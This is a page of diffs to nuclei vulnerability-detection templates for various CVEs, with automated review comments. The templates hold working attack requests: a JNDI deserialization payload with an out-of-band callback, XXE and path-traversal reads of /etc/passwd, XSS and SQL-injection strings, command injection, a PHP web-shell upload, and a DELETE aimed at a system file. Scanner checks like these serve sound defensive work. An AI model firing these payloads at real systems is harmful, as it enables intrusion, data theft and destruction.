# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950


@ -6,28 +6,29 @@ info:
severity: medium
description: |
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
reference:
- https://tenable.com/security/research/tra-2022-30
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
- https://github.com/JoshuaMart/JoshuaMart
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38131
cwe-id: CWE-601
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
epss-score: 0.0006
epss-percentile: 0.23591
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
metadata:
product: connect
shodan-query: "http.favicon.hash:217119619"
fofa-query: "app=\"RStudio-Connect\""
max-request: 1
verified: true
vendor: rstudio
product: connect
shodan-query: http.favicon.hash:217119619
fofa-query: app="RStudio-Connect"
tags: tenable,cve,cve2022,redirect,rstudio
http:
@ -46,4 +47,4 @@ http:
- type: status
status:
- 307
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950


@ -18,8 +18,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
epss-score: 0.01317
epss-percentile: 0.84504
epss-score: 0.00932
epss-percentile: 0.82572
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950


@ -17,7 +17,7 @@ info:
cve-id: CVE-2023-0552
cwe-id: CWE-601
epss-score: 0.00086
epss-percentile: 0.35637
epss-percentile: 0.34914
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -38,4 +38,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: citrix
product: sharefile_storage_zones_controller
shodan-query: title:"ShareFile Storage Server"
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,brute-force,kev,citrix
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
variables:
fileName: '{{rand_base(8)}}'
@ -61,4 +61,4 @@ http:
- type: dsl
dsl:
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
# digest: 4a0a00473045022100b8908e3d0d507eafb4daa66943662e7f35d530024af777cd331040b9eda4540d022022868e31a2dbfcfb4347f872741b77feac8ac0a89509d5d3fc045ecd373c196d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205ab85a74f3c255c163c9d99bda2ff69666328d81782c9b4a8c2bc1d63128106b022100c10ae18b7db4ed08a5e2b324af93397140801b423282274cc2cbe4ddb0e93b0a:922c64590222798bb761d5b6d8e72950


@ -22,7 +22,7 @@ info:
cve-id: CVE-2023-26255
cwe-id: CWE-22
epss-score: 0.15138
epss-percentile: 0.95348
epss-percentile: 0.95663
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
metadata:
max-request: 1
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950


@ -6,28 +6,29 @@ info:
severity: critical
description: |
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
reference:
- https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/gift-voucher/
- https://github.com/ARPSyndicate/cvemon
- https://github.com/JoshuaMart/JoshuaMart
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-28662
cwe-id: CWE-89
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
epss-score: 0.00076
epss-percentile: 0.31593
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
metadata:
vendor: codemenschen
product: gift_vouchers
product: "gift_vouchers"
framework: wordpress
fofa-query: body="/wp-content/plugins/gift-voucher/"
fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
max-request: 2
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
flow: http(1) && http(2)
@ -59,4 +60,4 @@ http:
- status_code == 500
- contains(body, 'critical error')
condition: and
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950


@ -13,13 +13,14 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
- https://github.com/mayur-esh/vuln-liners
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-32563
cwe-id: CWE-22
epss-score: 0.43261
epss-percentile: 0.97013
epss-score: 0.42647
epss-percentile: 0.97218
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -56,4 +57,4 @@ http:
part: body_2
words:
- "CVE-2023-32563"
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,52 @@
id: CVE-2023-38203
info:
name: Adobe ColdFusion - Deserialization of Untrusted Data
author: yiran
severity: critical
description: |
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.
reference:
- https://blog.projectdiscovery.io/adobe-coldfusion-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2023-38203
- https://github.com/Ostorlab/KEV
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-38203
cwe-id: CWE-502
epss-score: 0.517
epss-percentile: 0.97465
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev
variables:
callback: "{{interactsh-url}}"
jndi: "ldap%3a//{{callback}}/zdfzfd"
http:
- raw:
- |
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- contains(body, "ColdFusion documentation")
condition: and
# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950
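Review bot: `cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*` names only ColdFusion 2018 while the description and remediation cover the 2021 and 2023 lines as well; if the classification is meant to carry one cpe per affected product line the 2021 and 2023 entries are missing, otherwise a comment saying the single cpe is deliberate would avoid the question. The remediation text reads `ColdFusion 2023 Update2` (missing space, inconsistent with `Update 18` and `Update 8` in the same sentence). The `callback` variable is only an alias for `{{interactsh-url}}` and could be inlined into `jndi`, or given a comment saying why the indirection exists.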


@ -0,0 +1,48 @@
id: CVE-2023-40355
info:
name: Axigen WebMail - Cross-Site Scripting
author: amir-h-fallahi
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
reference:
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40355
cwe-id: CWE-79
epss-score: 0.0006
epss-percentile: 0.22931
metadata:
max-request: 3
verified: true
shodan-query: http.favicon.hash:-1247684400
tags: cve,cve2023,xss,axigen,webmail
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950
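Review bot: The `metadata` block has no `vendor`, `product` or `cpe` entry, unlike the other new CVE templates in this commit (compare CVE-2023-38203), so the template will not be found by vendor/product filtering; add them if NVD publishes a cpe for Axigen. The description says `allows authenticated attackers` while `cvss-metrics` has `PR:N` and the template sends unauthenticated GETs, which is worth reconciling (the wording may simply be copied from the advisory). The first matcher word carries one more backslash than the payload in the first two paths; a one-line comment explaining the expected reflection would spare the next maintainer from "fixing" it.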


@ -0,0 +1,39 @@
id: CVE-2023-42344
info:
name: OpenCMS - XML external entity (XXE)
author: 0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
metadata:
max-request: 2
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,xxe,opencms
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950
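Review bot: This template has no `classification` block (no `cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`, `cpe`) and `metadata` has no `vendor`/`product`, unlike the other new CVE templates in this commit; add at least `cve-id: CVE-2023-42344` and the XXE CWE (`cwe-id: CWE-611`) so the template is reachable through the usual filters. The description starts mid-sentence (`users can execute code without authentication.`) and reads like a truncated paste; reword it into complete sentences. `fofa-query: "OpenCms-9.5.3"` looks like a version label rather than a query expression (the other templates use `app="..."`), and the `xmlns:cmis` value is wrapped in `<...>`, which reads like a markdown autolink artifact — confirm both are intended, since the matcher requires `invalidArgument` together with the file content and a malformed namespace may be what produces that response.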


@ -0,0 +1,38 @@
id: CVE-2023-45671
info:
name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
remediation: It has been fixed in version 0.13.0 Beta 3
reference:
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
- https://nvd.nist.gov/vuln/detail/CVE-2023-45671
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
cve-id: CVE-2023-45671
cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: frigate
product: frigate
shodan-query: title:"Frigate"
tags: cve,cve2023,frigate,xss
http:
- method: GET
path:
- "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
- 'contains(header, "text/html")'
- 'status_code == 404'
condition: and
# digest: 4b0a00483046022100cba5c4d12e50a528bb189f495e3c9da2618e5180146b4624cd3997b834063fe60221009b11601e94531407edaa7ee1e9dfb799e2167598089b2ddcdac99db6d1c3736f:922c64590222798bb761d5b6d8e72950
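Review bot: `classification` lists the CVSS vector, `cve-id` and `cpe` but no `cwe-id`; for a reflected XSS that would be `cwe-id: CWE-79`, matching the templates in this commit that carry CWE ids. The `cpe` is pinned to `0.13.0:beta1` although the description says every release before 0.13.0 Beta 3 is affected, so a version-range form may be more accurate if the repository convention allows it. Minor wording: `description` has `This vulnerability could exploited` (missing `be`).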


@ -16,8 +16,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: html:"welcome.cgi?p=logo"
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 2
tags: cve,cve2023,kev,auth-bypass,ivanti
http:
@ -48,4 +49,4 @@ http:
- 'contains(body_2, "block_message")'
- 'contains(header_2, "application/json")'
condition: and
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950
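Review bot: Quoting `product: "connect_secure"` is inconsistent with the rest of this commit, where only the search-engine queries that embed `"` are quoted and `product`/`vendor` stay plain (for example `product: winter` in the Winter CMS hunk); the same applies to the Ivanti SSRF hunk later on this page. Quoting `shodan-query` is justified because the value contains double quotes, so that part of the change is fine. The hunk header counts 8 old and 9 new lines but only two removed and two added lines are visible, so one added line seems to be missing from the rendered page. The enclosing `info` mapping starts outside the hunk.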


@ -0,0 +1,62 @@
id: CVE-2023-48777
info:
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
remediation: Fixed in 3.18.2
reference:
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
metadata:
verified: true
max-request: 4
framework: wordpress
publicwww-query: "/wp-content/plugins/elementor/"
tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
variables:
filename: "{{rand_base(6)}}"
payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{(unknown)}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
- |
GET /wp-content/{(unknown)}.php?cmd=cat+/etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_4)"
- "status_code_4 == 200"
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
# digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950
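Review bot: `variables.filename` is declared but never referenced; the two places that should use it (`fileName` in `payload` and the final `GET /wp-content/...php` path) show `{(unknown)}`, which looks like a rendering artifact of this page rather than nuclei syntax, so confirm the source file uses `{{filename}}` in both. The template uploads an executable PHP file and nothing removes it, which leaves a publicly reachable web shell on every confirmed host; the `intrusive` tag only partly covers that, so `description` should state that a file is left behind so responders can clean it up. `info` also lacks a `classification` block (`cve-id: CVE-2023-48777`, `cwe-id: CWE-434`), which the sibling Monitorr upload template in this commit does carry.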


@ -14,14 +14,15 @@ info:
cvss-score: 5.4
cve-id: CVE-2023-52085
cwe-id: CWE-22
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12483
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
metadata:
vendor: wintercms
product: winter
shodan-query: title:"Winter CMS"
fofa-query: title="Winter CMS"
shodan-query: "title:\"Winter CMS\""
fofa-query: "title=\"Winter CMS\""
max-request: 4
tags: cve,cve2023,authenticated,lfi,wintercms
http:
@ -68,4 +69,4 @@ http:
regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950


@ -48,13 +48,13 @@ http:
path:
- "{{BaseURL}}/wp-login.php"
headers:
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(5)))NkcI) AND "tqKU"="tqKU
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'duration>=7'
- 'status_code == 200'
- 'contains(body, "wp-admin")'
condition: and
# digest: 490a004630440220711084c66864d0f0ed8c49720ebfc388d1902517733600bac42c326ca8ffe14702206f9bb4ad5b87af58606cf3c4970f194074fc852d625138497b225c64f7b89d6a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210093bf3e2e6772a217d1c09ef23feff29a86dcb2db0c7824b6ca669c673564321a02202f3ace02b3e57883eb764701f4c31c4a1cb5ba8cd42ea02ff8a8e23b05c547f9:922c64590222798bb761d5b6d8e72950
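Review bot: Raising the delay to `SLEEP(7)` with `duration>=7` still relies on a single absolute timing sample, and because this is a `path:` request rather than a `raw:` one no `@timeout` can be attached to it; nuclei's default request timeout (10 s by default) is close to the new threshold, so a slow but vulnerable host may time out and be reported clean while an unrelated slow host may exceed 7 s and be reported vulnerable. A baseline request without the payload, compared as `duration_2 - duration_1 >= 7`, would tie the verdict to the injected delay rather than to network latency. The enclosing `http` request starts outside the hunk.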


@ -0,0 +1,62 @@
id: CVE-2023-6831
info:
name: mlflow - Path Traversal
author: byObin
severity: high
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-6831
cwe-id: CWE-22
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12693
metadata:
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
max-request: 2
verified: true
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
http:
- raw:
- |
PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{randstr}}
- |
DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- "Content-Type: application/json"
- "Server: gunicorn"
condition: and
- type: word
part: body_2
words:
- "{}"
- type: status
status:
- 500
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950
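Review bot: The second request issues `DELETE` on a traversal path ending in `etc%252fpasswd`, i.e. it asks the server to remove `/etc/passwd`; on a vulnerable instance running with enough privileges that is destructive, yet `tags` carries no `intrusive` marker. The first request already uploads an artifact named `{{randstr}}` that is never used afterwards, so the traversal should point back at that artifact instead of a system file, and `intrusive` should be added for as long as the check deletes anything. The `status: 500` and `{}` body matchers suggest the verdict relies on the server failing the delete, which is not the same as proving the traversal was rejected.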


@ -0,0 +1,56 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "TTL="
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
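Review bot: The body matcher `TTL=` is case-sensitive (nuclei word matchers match exact case unless `case-insensitive: true` is set), and Linux `ping` prints `ttl=` in lowercase, so if the appliance is Linux-based the `and` across all three matchers never fires even when the interactsh DNS callback arrives. Either add `case-insensitive: true` to that matcher or drop it, since the out-of-band callback already proves command execution. The `cpe` uses the `o:` (operating-system) part where the other templates in this commit use `a:`; worth confirming against the NVD entry.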


@ -6,24 +6,25 @@ info:
severity: critical
description: |
